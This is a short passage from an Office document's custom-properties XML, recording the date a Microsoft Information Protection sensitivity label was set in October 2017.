  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_SetDate">
    <vt:lpwstr>2017-10-05T15:37:42.9896132+02:00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